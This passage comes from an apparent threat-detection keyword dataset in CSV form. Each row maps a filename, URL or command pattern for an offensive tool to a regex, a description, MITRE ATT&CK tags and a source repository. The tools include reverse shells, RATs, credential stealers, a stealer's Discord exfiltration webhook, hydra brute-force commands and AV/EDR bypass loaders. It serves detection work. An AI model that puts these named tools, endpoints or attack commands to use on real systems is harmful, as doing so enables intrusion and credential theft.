Access","https://ntlm.pw","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*https://ntlm.pw/*",".{0,1000}https\:\/\/ntlm\.pw\/.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","8","1","7","0","2023-12-12T17:23:35Z","2023-12-12T16:41:35Z" "*https://pastebin.com/9JyjcMAH*",".{0,1000}https\:\/\/pastebin\.com\/9JyjcMAH.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*https://pastebin.com/iBeTbXCw*",".{0,1000}https\:\/\/pastebin\.com\/iBeTbXCw.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*https://pastebin.com/raw/fevFJe98*",".{0,1000}https\:\/\/pastebin\.com\/raw\/fevFJe98.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*https://proxy.duckduckgo.com/iu/?u=https://pdxkmdcepvahysnnxe.pythonanywhere.com/image.jpg?cmd=*",".{0,1000}https\:\/\/proxy\.duckduckgo\.com\/iu\/\?u\=https\:\/\/pdxkmdcepvahysnnxe\.pythonanywhere\.com\/image\.jpg\?cmd\=.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","1","N/A","10","10","69","7","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z" "*https://ptb.discord.com/api/webhooks/1226217588959215726/AZaNnD4TIN-9sV-t0rsveiQxcROYaCVziI8BUa6CNPsUxdnW9mdHu7HnuQ55kQPXZ8_5*",".{0,1000}https\:\/\/ptb\.discord\.com\/api\/webhooks\/1226217588959215726\/AZaNnD4TIN\-9sV\-t0rsveiQxcROYaCVziI8BUa6CNPsUxdnW9mdHu7HnuQ55kQPXZ8_5.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*https://raw.githubusercontent.com/KasRoudra/CamHacker*",".{0,1000}https\:\/\/raw\.githubusercontent\.com\/KasRoudra\/CamHacker.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*'https://slack.com/api/channels.create'*",".{0,1000}\'https\:\/\/slack\.com\/api\/channels\.create\'.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*https://sniff.su/*.gz*",".{0,1000}https\:\/\/sniff\.su\/.{0,1000}\.gz.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*https://sniff.su/*.zip*",".{0,1000}https\:\/\/sniff\.su\/.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*https://t.me/BotFather*",".{0,1000}https\:\/\/t\.me\/BotFather.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","295","48","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z" "*https://t.me/machine1337*",".{0,1000}https\:\/\/t\.me\/machine1337.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","295","48","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z" "*https://t.me/moom825*",".{0,1000}https\:\/\/t\.me\/moom825.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*https://unit259.fyi/db*",".{0,1000}https\:\/\/unit259\.fyi\/db.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*https://viperone.gitbook.io/pentest-everything*",".{0,1000}https\:\/\/viperone\.gitbook\.io\/pentest\-everything.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*https://watch-youtube-videos-live*",".{0,1000}https\:\/\/watch\-youtube\-videos\-live.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*https://weakpass.com/*",".{0,1000}https\:\/\/weakpass\.com\/.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*https://web.archive.org/*https://www.kernel-exploits.com/media/*",".{0,1000}https\:\/\/web\.archive\.org\/.{0,1000}https\:\/\/www\.kernel\-exploits\.com\/media\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*https://wfuzz.readthedocs.io*",".{0,1000}https\:\/\/wfuzz\.readthedocs\.io.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz*",".{0,1000}https\:\/\/www\.blackhillsinfosec\.com\/bypass\-anti\-virus\-run\-mimikatz.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*https://www.browserling.com/browse*",".{0,1000}https\:\/\/www\.browserling\.com\/browse.{0,1000}","offensive_tool_keyword","browserling","proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","browserling.com","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*https://www.myget.org/F/fireeye/api/v2*",".{0,1000}https\:\/\/www\.myget\.org\/F\/fireeye\/api\/v2.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*https://www.synacktiv.com/publications/ounedpy-exploiting-hidden-organizational-units-acl-attack-vectors-in-active-directory*",".{0,1000}https\:\/\/www\.synacktiv\.com\/publications\/ounedpy\-exploiting\-hidden\-organizational\-units\-acl\-attack\-vectors\-in\-active\-directory.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*https://youareanidiot.cc*",".{0,1000}https\:\/\/youareanidiot\.cc.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*https://YOURREDIRECTWEBSERVER.azurewebsites.net*",".{0,1000}https\:\/\/YOURREDIRECTWEBSERVER\.azurewebsites\.net.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","1","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*https_payload_localtunnel.ps1*",".{0,1000}https_payload_localtunnel\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*https_payload_localtunnel_outfile.ps1*",".{0,1000}https_payload_localtunnel_outfile\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*https_payload_ngrok.ps1*",".{0,1000}https_payload_ngrok\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*https_payload_ngrok_outfile.ps1*",".{0,1000}https_payload_ngrok_outfile\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*https_payload_trusted.ps1*",".{0,1000}https_payload_trusted\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*https_revshell.exe*",".{0,1000}https_revshell\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*httpsmuggler.jar*",".{0,1000}httpsmuggler\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*https-portal*",".{0,1000}https\-portal.{0,1000}","offensive_tool_keyword","https-portal","HTTPS-PORTAL is a fully automated HTTPS server powered by Nginx. Lets Encrypt and Docker. By using it. you can run any existing web application over HTTPS. with only one extra line of configuration. The SSL certificates are obtained. and renewed from Lets Encrypt automatically.","T1042 - T1571 - T1021 - T1135","TA0002 - TA0003 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/SteveLTN/https-portal","1","0","N/A","N/A","10","4366","291","2024-01-17T05:24:08Z","2015-12-14T20:09:04Z" "*'http-stager'*",".{0,1000}\'http\-stager\'.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*huan.exe *.exe",".{0,1000}huan\.exe\s.{0,1000}\.exe","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","0","N/A","N/A","6","525","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*Huan.sln*",".{0,1000}Huan\.sln.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","525","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*Huan.vcxproj*",".{0,1000}Huan\.vcxproj.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","525","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*HuanLoader.vcxproj*",".{0,1000}HuanLoader\.vcxproj.{0,1000}","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","525","107","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*hub.docker.com/u/kalilinux/*",".{0,1000}hub\.docker\.com\/u\/kalilinux\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*HunnicCyber/SharpDomainSpray*",".{0,1000}HunnicCyber\/SharpDomainSpray.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*HVNC - Tinynuke Clone*",".{0,1000}HVNC\s\-\sTinynuke\sClone.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*HVNC Server.exe*",".{0,1000}HVNC\sServer\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*HVNC.Properties*",".{0,1000}HVNC\.Properties.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*HVNC\ Server*",".{0,1000}HVNC\\\sServer.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "*hXOR-Packer.v0.1.zip*",".{0,1000}hXOR\-Packer\.v0\.1\.zip.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","1","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*hXOR-Packer-main*",".{0,1000}hXOR\-Packer\-main.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*hydra -*",".{0,1000}hydra\s\-.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*hydra * ftp://*",".{0,1000}hydra\s.{0,1000}\sftp\:\/\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*hydra * http-post-form *",".{0,1000}hydra\s.{0,1000}\shttp\-post\-form\s.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*hydra * mysql://*",".{0,1000}hydra\s.{0,1000}\smysql\:\/\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*hydra * ssh://*",".{0,1000}hydra\s.{0,1000}\sssh\:\/\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*hydra * telnet://*",".{0,1000}hydra\s.{0,1000}\stelnet\:\/\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*hydra smtp-enum*",".{0,1000}hydra\ssmtp\-enum.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*hydra.c*",".{0,1000}hydra\.c.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*hydra:x:10001:*",".{0,1000}hydra\:x\:10001\:.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*HYDRA_PROXY_HTTP*",".{0,1000}HYDRA_PROXY_HTTP.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*hydra-cobaltstrike*",".{0,1000}hydra\-cobaltstrike.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*Hyperion PE-Crypter*",".{0,1000}Hyperion\sPE\-Crypter.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*hyperion.exe *",".{0,1000}hyperion\.exe\s.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*hyperion_2.0.orig.tar.gz*",".{0,1000}hyperion_2\.0\.orig\.tar\.gz.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Hypnos-main.zip*",".{0,1000}Hypnos\-main\.zip.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","10","1","50","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z" "*hypobrychium.exe*",".{0,1000}hypobrychium\.exe.{0,1000}","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" "*hypobrychium-main*",".{0,1000}hypobrychium\-main.{0,1000}","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" 